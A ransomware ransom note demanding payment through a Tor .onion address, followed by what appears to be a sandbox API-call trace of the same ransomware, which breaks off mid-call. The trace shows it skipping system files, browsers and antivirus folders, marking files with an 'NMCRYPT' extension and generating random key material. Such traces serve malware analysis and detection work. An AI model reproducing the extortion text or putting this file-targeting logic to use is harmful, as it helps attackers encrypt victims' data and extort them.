All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.259] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0159.259] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0159.259] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.259] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.259] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0159.259] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.259] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0159.259] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*.exe") returned 0 [0159.259] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*.dll") returned 0 [0159.259] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*.lnk") returned 0 [0159.259] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*.bat") returned 0 [0159.259] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*.ini") returned 0 [0159.259] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*.msi") returned 0 [0159.259] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*.scf") returned 0 [0159.259] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*pagefile.sys*") returned 0 [0159.259] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*NTUSER.DAT*") returned 0 [0159.259] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*AppData*") returned 0 [0159.259] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*\\winrar\\*") returned 0 [0159.259] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.259] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*\\java\\*") returned 0 [0159.259] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0159.259] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*\\windows\\*") returned 0 [0159.259] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*\\ESET\\*") returned 0 [0159.259] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*\\AVG\\*") returned 0 [0159.259] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*\\AVIRA\\*") returned 0 [0159.260] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0159.260] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*Atheros*") returned 0 [0159.260] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*Realtek*") returned 0 [0159.260] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*bootmgr*") returned 0 [0159.260] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*boot*") returned 0 [0159.260] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*boot*") returned 0 [0159.260] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*CONFIG.SYS*") returned 0 [0159.260] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*IO.SYS*") returned 0 [0159.260] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*MSDOS.SYS*") returned 0 [0159.260] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*NTDETECT.COM*") returned 0 [0159.260] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*ntldr*") returned 0 [0159.260] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*chrome*") returned 0 [0159.260] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*opera*") returned 0 [0159.260] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", pszSpec="*firefox*") returned 0 [0159.260] wcslen (_String="\\\\?\\") returned 0x4 [0159.260] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad338 [0159.260] wcscmp (_String1=".", _String2=".") returned 0 [0159.260] FindNextFileW (in: hFindFile=0x9ad338, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.260] wcscmp (_String1="..", _String2=".") returned 1 [0159.260] wcscmp (_String1="..", _String2="..") returned 0 [0159.260] FindNextFileW (in: hFindFile=0x9ad338, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0159.260] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0159.260] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0159.260] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0159.260] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0159.260] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0159.260] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0159.260] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0159.260] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0159.260] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0159.260] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0159.260] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0159.260] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0159.260] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0159.260] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0159.260] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0159.260] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0159.260] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0159.260] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0159.260] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0159.260] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0159.261] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0159.261] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0159.261] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0159.261] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0159.261] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.261] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0159.261] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0159.261] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0159.261] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0159.261] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0159.261] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0159.261] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0159.261] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0159.261] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0159.261] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\lt-LT\\tipresx.dll.mui", pszSpec="*") returned 1 [0159.261] strlen (_Str="NMoreira") returned 0x8 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.261] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.262] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0159.263] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 